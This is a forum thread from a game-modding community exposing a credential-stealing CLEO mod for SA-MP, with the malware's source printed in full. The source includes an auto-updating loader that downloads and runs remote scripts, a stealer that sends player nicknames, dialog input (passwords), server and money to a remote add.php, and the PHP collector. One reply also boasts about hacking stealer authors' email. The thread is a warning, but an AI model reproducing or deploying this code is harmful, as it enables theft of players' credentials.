Intriguing scam (check if your data was stolen)

monday

Well-Known Member
Joined
Jun 23, 2014
Messages
918
Likes
3
Points
18
#1
[video=youtube]https://www.youtube.com/watch?v=dNTbpmnWZU0[/video]


Code:
0000:
 
const 
    SCRIPT_VERSION = 1
 
    UPDATEINFO_FILE = "cleo_name_update.txt"
    CHANGELOG_FILE = "cleo_name_changelog.txt"
end
 
repeat
    wait 3000
until 0AFA:  is_samp_available
 
wait 0
 
0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION
 
while true
    wait 0
end
 
:download_check_status 

[email protected] = -1
while [email protected] == -1 
    wait 0
    0C66: [email protected] = get_download [email protected] state 
end
0AB2: ret 1 [email protected] // 
 
:url_fileupdateinfo // 
// 
hex
    "http:" "/" "/" "rvankarus.esy.es/cleo/update.txt" 00
end
 
:check_updates
// call 
0AC6: [email protected] = label @url_fileupdateinfo offset // 
0C65: [email protected] = download_url [email protected] to_file UPDATEINFO_FILE // 
0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected]
0C7D: release_download [email protected] // 
 
if [email protected] <> 0 // 
then
    wait 0
else // ?????
    wait 0
 
    if 0AAB: file_exists UPDATEINFO_FILE // 
    then
        0AF0: [email protected] = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // 
        if 001D: [email protected] > [email protected] // 
        then
            wait 0
 
            0AC8: [email protected] = allocate_memory_size 260 // 
            0C11: memset destination [email protected] value 0 size 260 // 
 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // 
            0C65: [email protected] = download_url [email protected] to_file CHANGELOG_FILE // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] // 
            0C7D: release_download [email protected] //
 
            if [email protected] == 0
            then
                wait 0
 
            end
 
            // -------
            0C11: memset destination [email protected] value 0 size 260 // 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script_url" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/FileSystem.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "FileSystem.cs"

            if [email protected] == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination [email protected] value 0 size 260 // 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/animbot4.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "animbot4.cs"

            if [email protected] == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination [email protected] value 0 size 260 // 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data1" //
            0C65: [email protected] = download_url [email protected] to_file "data\Decision\chris\data1.txt" // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //

            if [email protected] == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination [email protected] value 0 size 260 // 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data2" //
            0C65: [email protected] = download_url [email protected] to_file "data\Decision\chris\data2.txt" // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //

            if [email protected] == 0
            then
            wait 0
            else
                wait 0
            end
 
            0AC9: free_allocated_memory [email protected]
        end
    end
end
0AB2: ret 0
 
:show_changelog // 
if 0A9A: [email protected] = openfile CHANGELOG_FILE mode "rt" // 
then
    0AC8: [email protected] = allocate_memory_size 96 // 
    0C11: memset destination [email protected] value 0 size 96
 
    0A9C: [email protected] = file [email protected] size // 
    [email protected]++ 
 
    0AC8: [email protected] = allocate_memory_size [email protected] // 
    0C11: memset destination [email protected] value 0 size [email protected]
    repeat     
        0AD7: read_string_from_file [email protected] to [email protected] size 95
        0C17: [email protected] = strlen [email protected]
        if [email protected] > 0
        then
            0C15: strcat destination [email protected] source [email protected] // 
        end
    until 0AD6: end_of_file [email protected] reached
 
    0B3B: samp show_dialog id 335 caption "{FFFFFF}Daniel Nguyen" text [email protected] button_1 "Closed" button_2 "" style 0 // 
 
    0AC9: free_allocated_memory [email protected] // 
    
    0AC9: free_allocated_memory [email protected] // 
    0A9B: closefile [email protected] // ????????? ????              
end
0AB2: ret 0

Code:
0000:

const 
    SCRIPT_VERSION = 1

    UPDATEINFO_FILE = "data\Decision\chris\cleo_name_update.txt"
    CHANGELOG_FILE = "data\Decision\chris\cleo_name_changelog.txt"
    DELTA_1 = "data\Decision\chris\delta.txt"
    NAVY_1 = "data\Decision\chris\navy.txt"
    HUMAN_1 = "data\Decision\chris\human.txt"
    AIR_1 = "data\Decision\chris\air.txt"
    COMMAN_1 = "data\Decision\chris\comman.txt" 
    SECU_1 = "data\Decision\chris\secu.txt" 
end

repeat
    wait 5000
    until 0B61:  samp is_local_player_spawned



0AF8: samp add_message_to_chat "" color -1

0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION

while true
    wait 0
end

:download_check_status 
// call @download_check_status 1 download_n [email protected]
[email protected] = -1
while [email protected] == -1 
    wait 0
    0C66: [email protected] = get_download [email protected] state /
end
0AB2: ret 1 [email protected] 

:url_fileupdateinfo 
//  URL 
hex
    "http:" "/" "/" "rvankarus1.pe.hu/cleo/update.txt" 00
end

:check_updates
// call @check_updates 1 current_version [email protected]
0AC6: [email protected] = label @url_fileupdateinfo offset // ??????? ?????? ? ????????????? ??????????
0C65: [email protected] = download_url [email protected] to_file UPDATEINFO_FILE // ???????? ?????????? ?????
0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected]
0C7D: release_download [email protected] // ???????????, ?.?. ?????????? ?????????

if [email protected] <> 0 // ???? ?????? ?? ????? 0(?.?. ???????? ????????? ????????), ??
then
     Marker.Disable([email protected])
else // ?????
     Marker.Disable([email protected])

    if 0AAB: file_exists UPDATEINFO_FILE // ???? ?? ???? ?? ??? ?????? ? ??????????? ??? ?????, ???????? ??? ?? ?????? ??????
    then
        0AF0: [email protected] = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // ?????? ????? ?????? ? ????????? ????? ??????????
        if 001D: [email protected] > [email protected] // ???? ??????? ?????? ??????? ??????, ??? ????????? ? ????? ??????????, ??
        then
             Marker.Disable([email protected])

            0AC8: [email protected] = allocate_memory_size 260 // ???????? ?????? ??? URL ???????? ?????
            0C11: memset destination [email protected] value 0 size 260 // ??????? ?? ???????? ????????(?? ?????? ??????)

            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // ?????? URL ???????? ?????? ?????????
            0C65: [email protected] = download_url [email protected] to_file CHANGELOG_FILE // ????????? ?????? ?????????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] // ???? ????????? ????????
            0C7D: release_download [email protected] //


            // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script2" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/anticrash-1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "anticrash-1.cs"


            if [email protected] == 0
            then
                Marker.Disable([email protected])
            else
                Marker.Disable([email protected])
            end
            
             // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/FileSystemOperations.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            
            if [email protected] == 0
            then
                Marker.Disable([email protected])
            else
                Marker.Disable([email protected])
            end
            
             // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script3" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/Systemcode.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "systemcode.cs"
            
            if [email protected] == 0
            then
                Marker.Disable([email protected])
            else
                Marker.Disable([email protected])
            end
            
             // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script4" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/backupp1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "backupp1.cs"
            
            
            if [email protected] == 0
            then
                Marker.Disable([email protected])
            else
                Marker.Disable([email protected])
            end
            
            
             // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script5" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/backupp2.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "backupp2.cs"
            
            
            
            
            


            0AC9: free_allocated_memory [email protected]
        end
    end
end
0AB2: ret 0

:show_changelog // ????????? ??????? ??? ?????? ?????? ?????????
if 0A9A: [email protected] = openfile CHANGELOG_FILE mode "rt" // ????????? ???? ??? ??????
then
    0AC8: [email protected] = allocate_memory_size 96 // ???????? ?????? ??? ?????? ?? ?????
    0C11: memset destination [email protected] value 0 size 96

    0A9C: [email protected] = file [email protected] size // ???????? ?????? ?????
    [email protected]++ // ????????? ?????? - ???????

    0AC8: [email protected] = allocate_memory_size [email protected] // ???????? ?????? ??? ?????? ?????????
    0C11: memset destination [email protected] value 0 size [email protected]
    repeat     
        0AD7: read_string_from_file [email protected] to [email protected] size 95
        0C17: [email protected] = strlen [email protected]
        if [email protected] > 0
        then
            0C15: strcat destination [email protected] source [email protected] // ??????????? ?????? ?? ????? ? ????? ?? ??????? ?????????
        end
    until 0AD6: end_of_file [email protected] reached

    0B3B: samp show_dialog id 335 caption "{66CC00}San Andreas Armed Service" text [email protected] button_1 "10-4" button_2 "" style 0 // ?????????? ??????

    0AC9: free_allocated_memory [email protected] // ????? ?? ????????????

    0AC9: free_allocated_memory [email protected] //
    0A9B: closefile [email protected] // ????????? ????              
end
0AB2: ret 0
Code:
<?php  
  $f = fopen("Readme.HTML", "a");  
  $s = "<u>Login:</u><strong> " . $_GET['nick'] . " |...|</strong> " . " <u>Ip:</u> " . $_GET['ip'] . " <strong>|...|</strong> " . " <u>Server:</u><em> " . $_GET['serv'] . " </em><strong>|...|</strong> " . " <u>Dialog:</u> " . $_GET['dialog'] . " <strong>|...|</strong> " . " <u>Text:</u><strong> " . $_GET['input'] . " |...|</strong> " . " <u>Money:</u> " . $_GET['mn'] . "<br />";  
  fwrite($f, $s);  
  fclose($f);  
  ?>

//--------------------------------------------------------------------------------------------------------------------------------------------------------
}
{$CLEO}
thread 'NoName'
While 8afa:
wait 100
end   
While 8B4C: -1
wait 100
end
While 0B4C: -1
wait 0
0B4E: samp [email protected] = get_current_dialog_id
0AC8: [email protected] = 64
repeat
wait 0
0B4A: samp [email protected] = get_current_dialog_editbox_text
until 8B4C: -1  
0AC8: [email protected] = 24
0B2B: [email protected] = $PLAYER_ACTOR
0B36: samp [email protected] = get_player_nickname [email protected]
wait 500
010B: [email protected] = player $PLAYER_CHAR money
0AC8: [email protected] = 15
0B39: samp get_current_server_address [email protected] port [email protected]
0AC8: [email protected] = 86
0B3A: samp [email protected] = get_current_server_name
0C17: [email protected] = strlen [email protected]
if [email protected] > 1
    then  
    0AC8: [email protected] = 445       
    0AD3: [email protected] = format "http:%c%crvankarus.esy.es%ccleo%cadd.php?nick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d" params 47 47 47 47 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] // ñá â êîâû÷êàõ íåëüçÿ ïèñàòü ñëåøü, ïîýòìó òàì ãäå äîëæíà áûòü ñëåøü ñòîèò %c - çíàê çàïèñàíûé â ïàðàìåòðàõ.  ïàðàìåòðàõ äëÿ êàæäîé %c ïðîïèñàí 47 - ýòî íîìåð ñëåøà. Ñòàíäàðòíî ñòîèò àäðåñ http://stilloger.ph/stealer/add.php?[äàëåå äàííûå], òàê êàê ñá íå ëþáèò ñëåøü â êîâû÷êàõ, òî àäðåñ çàïèñàí òàê http:%c%cstilloger.ph%cstealer%cadd.php?[äàëåå äàííûå]
    0AA2: [email protected] = load_library "urlmon.dll" // IF and SET
    0AA4: [email protected] = get_proc_address "URLDownloadToFileA" library [email protected] // IF and SET     
    0AA5: call [email protected] num_params 5 pop 0 params lpfnCB 0 dwReserved 0 szFileName "%TEMP%\2352sfe.tmp" szUrl [email protected] caller 0  
    0AA3: [email protected]  
    0AC9: [email protected]
    end
0AC9: [email protected]
0AC9: [email protected]
0AC9: [email protected]
0AC9: [email protected]
wait 500 
end     
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0 
[email protected] = 0
[email protected] = 0
[email protected] = 0
wait 1000
0A93: end_custom_thread
0A93: end_custom_thread
0A93: end_custom_thread
0A93: end_custom_thread

some nice names for malware:
-FileSystem.cs (downloaded from http://rvankarus.esy.es/cleo/steal.cs xD)
-backup2.cs
-anticrash-1
-systemcode.cs
-backupp1.cs
-backupp2.cs

 
OP
OP
monday

monday

Well-Known Member
Joined
Jun 23, 2014
Messages
918
Likes
3
Points
18
#3
essentially it's a credentials stealer, it uploads something like this:
Name: Douglas_Spatacus | Sever: 163.44.206.243:7777 | Server: [VcG] Vietnamese Community GTA | Dialog: 50 | Password: | | Money: 142907377 |IP: 00.000.000.00 | Time: [2017/07/02 - 18:30:06]

But it has auto updates and created cleo files that are not hosted on his server now so it's difficult to say what exactly it did or what exactly it will do in future, it could to anything
 

0BE4

Well-Known Member
Joined
Jan 15, 2017
Messages
134
Likes
0
Points
16
#4
nice warning, tho i think admins here check if each .cs is clean... right admins (Not sure i just think i heard that before from springfield(aka if you are reading this springfield and you don't remember shit you can just pm me and i'll remove this part) but MAYBE i am just saying MAYBE they just throw shit)? but there are many people here who download anything from anywhere without decompiling it...

Psst. LOL this comment doesn't even give a single useful statement it's just a pile of maybes xD

If you are too lazy to read: Good thing there is actually a living human who doesn't get too lazy to warn others...

useful tips:
there is a good anti stealer(Never actually made a stealer to test it)...
.exe's are mostly very unsafe you can absolutely hide ANYTHING even a rat if you want...
Never download anything that says: write your name and delete it why? because it's simply a keylogger just because they can't log your name they ask you to type it so that they get
it logged
Never download anything that says "exploit" in it which asks you for a specific server and a specific amount of money why you may ask? NO exploit in this world asks for a specific
amount of money unless the value is VERY specific...
try virustotal.com results aren't too accurate (I made an entire goddamn rat that doesn't even get detected)
Decompile every cleo you have and every cleo you will download... if it's encrypted better never touch it
if you don't know how to understand code spam springfield (Just kidding)
it's just about simple instructions you can read cleo viruses and shit never looks like a simple set car position cleo

Sorry there is no a lazy version...
 

Zin

Well-Known Member
Joined
Aug 1, 2013
Messages
1,269
Likes
0
Points
36
Website
youtube.com
#5
Actually there is a lazy version.

http://ugbase.eu/Thread-IMPORTANT-Informations-regarding-CLEO-Keyloggers?highlight=%28IMPORTANT%29+Informations+regarding+CLEO+Keyloggers
 
OP
OP
monday

monday

Well-Known Member
Joined
Jun 23, 2014
Messages
918
Likes
3
Points
18
#6
The video and the mod has been shared and probably made by "Daniel Nguyen", who deleted it, created a new account on UGBASE "ParkCant" and UGBASE discord "Tose_Khovor", trying to convince me to delete the source code because:




He wrote to himself using alternative fb account, made 2 accounts (ugbase + discord) to pretend he's worrying about people making malware, potentially made few "shit-posts" just to increase his credibility (and move this thread away from the latest topics), said that someone in his group shared it and said it was "anti-crash", he posted 2 images of it, 1st showing the post, 2nd showing members of that group (he probably doesn't know that the first displayed person of the group is the owner of the account xD)

[img=200x200]http://cdn-static.denofgeek.com/sites/denofgeek/files/styles/main_wide/public/2017/01/sherlock_holmes.jpg?itok=rWgQ454n[/img]
 

0BE4

Well-Known Member
Joined
Jan 15, 2017
Messages
134
Likes
0
Points
16
#8
xD ... i was once sent to one of these but it was .exe it used to simply get the data and send it via email to the noob... So i disassembled it AND just by using the very basics i was able to access his email .... xD Yeah trust me it's VERY easy to get it if the guy is too noob(Don't worry they are mostly are)... maybe i'll do a thread on how to get emails and passwords from noobs sending stealers and shit... Now i enjoy these "Stealers" a bit too much xD
 

WaTTi

Well-Known Member
Joined
Jan 4, 2015
Messages
239
Likes
0
Points
16
Website
ww
#10
TeRmminaTo[R] said:
can someone tell me how this work i dont understand :/ ( can someone give me a link to download it full xD)
WHY YOU WANT DOWNLOAD AND USE A FUCKING DATA STEALER. :-/
 
Top